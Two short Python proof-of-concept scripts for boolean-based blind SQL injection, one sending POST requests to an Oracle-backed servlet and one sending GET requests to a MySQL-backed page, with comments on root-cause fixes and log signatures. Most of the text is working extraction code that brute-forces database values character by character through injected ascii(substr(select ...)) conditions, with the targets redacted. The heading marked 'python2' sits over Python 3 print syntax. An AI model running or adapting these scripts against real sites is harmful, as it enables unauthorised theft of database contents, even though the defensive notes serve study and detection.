post + oracle + python2
import requests
# Boolean-based blind SQL injection proof of concept: POST form, Oracle back end.
# The page lost its indentation; the nesting below is reconstructed from the
# control flow (the placement of the final print inside the row loop is inferred).
#
# What it demonstrates: the server splices the 'xxx_x' form field into a SQL
# statement as text, so a quoted fragment can append an extra AND condition.
# The response then differs depending on whether that condition is true.
#
# Defender notes:
#   * Root-cause fix is bind variables / prepared statements for this field;
#     escaping or keyword filtering alone is not a fix.
#   * In access logs and WAF telemetry this appears as long runs of POSTs from
#     one session that differ only in two or three integers, with
#     "ascii(substr((select" inside a form value.
#   * A least-privilege database account limits which tables such a condition
#     can read at all.
cookies = {'xxID': 'XXXXX.XXXXX_servlet_XXXXX'}
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
endpoint = 'hxxp://xx.com/xx/xx.xx.PresentationController'

for row_number in range(22, 25):
    for char_position in range(1, 15):
        for code_point in range(48, 122):
            # One comparison per request: "is character N of row R equal to this code?"
            condition = '1%\' and \'1\'=\'1\' and (ascii(substr((select xxx_ID from (select rownum rn, xx_ID from xx_x_MEMBER) where rn='+str(row_number)+'),'+str(char_position)+',1))='+str(code_point)+')--'
            form = {
                'tranxx': 'L',
                'blm': 'com.xxx.xxBoard',
                'xxx_num': '1',
                'url': '/xxx/xx.jsp',
                'page': '1',
                'xx_category': 'xxx',
                'xx_seq': '',
                'xx_pagexxx': 'nimda',
                'xx_xxbun': '',
                'xxx': '1',
                'xxx_x': condition,
            }
            response = requests.post(endpoint, data=form, cookies=cookies, headers=headers)
            # The marker string 'tag' in the body is treated as "condition was true".
            if 'tag' in response.text:
                print(chr(code_point), end='')
                break
    # Separate the output for each row.
    print('\n')
get + mysql + python3
import urllib.request
# Boolean-based blind SQL injection proof of concept: GET query string, MySQL back end.
# The page lost its indentation; the nesting below is reconstructed from the
# control flow.
#
# What it demonstrates: the 'xort' query parameter carries a whole subquery, so
# the server evidently places that parameter into the SQL text unquoted
# (presumably as a sort expression -- confirm against the application).
#
# Defender notes:
#   * Identifiers and sort expressions cannot be bound as parameters; map the
#     request value through a fixed allow-list of column names instead.
#   * Log signature: bursts of GETs on one session cookie that differ only in
#     two integers, with "ascii(substr((SELECT" URL-encoded in the query string.
url = "hxxp://localhost/xxx"

# First request only obtains the session cookie that later requests replay.
session_id = urllib.request.urlopen(urllib.request.Request(url)).headers.get("Set-Cookie")

for char_position in range(1, 6):
    for code_point in range(48, 122):
        query = "?x=home&x=1&x=xx&xid=x1&xort=(select%201%20from%20xx_xxx_xxx%20where%20(ascii(substr((SELECT%20xx%20FROM%20x_xx_xxx%20limit%202,1),"+str(char_position)+",1))="+str(code_point)+"))&xxxxx=&xxxxx=1&&where=xx&keyword=xxx"
        probe = urllib.request.Request(url + query)
        probe.add_header("cookie", session_id)
        body = urllib.request.urlopen(probe).read().decode()
        # As written on the page, the match signal is the ABSENCE of the marker
        # string "tag" in the response body.
        if "tag" not in body:
            print(chr(code_point), end='')
            break